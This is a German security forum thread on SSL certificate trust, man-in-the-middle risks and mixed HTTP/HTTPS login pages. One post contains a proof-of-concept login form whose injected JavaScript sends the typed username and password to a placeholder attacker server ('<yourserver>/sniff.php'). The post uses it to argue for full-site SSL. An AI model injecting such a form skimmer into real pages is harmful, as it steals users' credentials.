Du verwendest einen veralteten Browser. Es ist möglich, dass diese oder andere Websites nicht korrekt angezeigt werden. Du solltest ein Upgrade durchführen oder ein alternativer Browser verwenden.
Naja, ich finde diese Meldung wenig überraschend. Jeder der sich näher mit dem Signierungsprozess von Zertifikaten beschäftigt hat, sollte schon gemerkt haben, dass sowas potentiell möglich ist.
Vielleicht findet nun aber mal ein Umdenken bei den Browser-Herstellern statt, nicht Hunderte von CA-Zertifkaten fest in die Browser zu integrieren und danach einfach alles durchzuwinken...
Es gibt für Firefox diese Erweiterung: Perspectives.
Im Prinzip fragt Firefox bei jeder neuen SSL-Verbindung, ob das Zertifikat bereits anderen Nutzern bekannt ist. So soll sichergestellt werden, dass bei selbstsignierten Zertifikaten kein einfacher mitm-Angriff möglich ist, weil keiner den Fingerprint auswendig kennt
Hilft aber nicht gegen langfristig durchgeführte Angriffe.
Ich bin der Meinung von Dresko.
Es ist eigentlich nichts neues.
Unser Informatik Lehrer hat dies sogar erwähnt als wir das Thema "Verschlüsselung und Signierung" durchmachten.
Es ist aber die beste Alternative zum normalen http.
Worüber ich mir mehr sorgen mache ist die Einbindung in Web-Services:
Ein bekanntes soziales Netzwerk, dessen Name ich jetzt nicht nennen will, verfügt zum Beispiel über so eine geniale Einbindung.
Die original Seite ruft beim Login eine https-Seite auf.
Warum sollte ich auf die https-Verbindung warten, wenn ich direkt die Login-Seite manipulieren kann und so beim klicken des Login Buttons das Passwort an mich, als MITM-Angreifer, senden kann.
Von mir aus gleich ein redirect weiter an den original Server. So bemerkt der User nichts.
(Advanced: Login-Formular so bearbeiten das ein Ajax-Request an deinen Server mit dem Passwort gesendet wird und den Login normal durchführen.
Abgeändertes Login-Formular per MITM-Angriff
Code:
<script type="text/javascript">
function ProofOfConcept()
{
var Sniffer;
if (window.XMLHttpRequest)
{
// Firefox, Safari, ...
Sniffer = new XMLHttpRequest();
}
else if (window.ActiveXObject) // ActiveX version
{
// Internet Explorer
Sniffer = new ActiveXObject("Microsoft.XMLHTTP");
}
Sniffer.onreadystatechange = function() { };
Sniffer.open('GET', "http://<yourserver>/sniff.php?user=" + document.ajax.user.value + "&pass=" + document.ajax.pass.value, true);
Sniffer.send(null);
}
</script>
<FORM method="POST" name="ajax" action="[COLOR=Red][B]https[/B][/COLOR]://<censored>/login.php">
<INPUT type="text" value="" name="user">
<INPUT type="password" value="" name="pass">
<INPUT type="button" value="Submit" ONCLICK="ProofOfConcept()">
</FORM>
Meine Meinung dazu ist entweder die Seite vollkommen mit SSL schützen oder es ganz zu lassen.
Ein Mix aus beidem ist irgendwie seltsam.
![[HaBo]](/styles/default/logoklein.png)
